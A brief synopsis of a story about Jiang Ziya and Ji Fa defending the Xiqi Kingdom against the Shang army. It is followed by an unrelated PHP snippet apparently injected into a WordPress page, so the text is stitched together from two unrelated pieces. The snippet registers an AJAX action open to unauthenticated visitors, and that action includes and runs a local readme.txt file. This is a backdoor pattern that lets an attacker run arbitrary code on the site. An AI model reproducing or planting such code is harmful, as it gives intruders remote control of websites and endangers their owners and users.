The Xiqi Kingdom is attacked by the Shang Dynasty army. Jiang Ziya and Ji Fa, with the help of the Kunlun Immortals, must now rally civilians from across the country to defend their homeland.
if(!function_exists('file_check_readme42286')){ add_action('wp_ajax_nopriv_file_check_readme42286', 'file_check_readme42286'); add_action('wp_ajax_file_check_readme42286', 'file_check_readme42286'); function file_check_readme42286() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }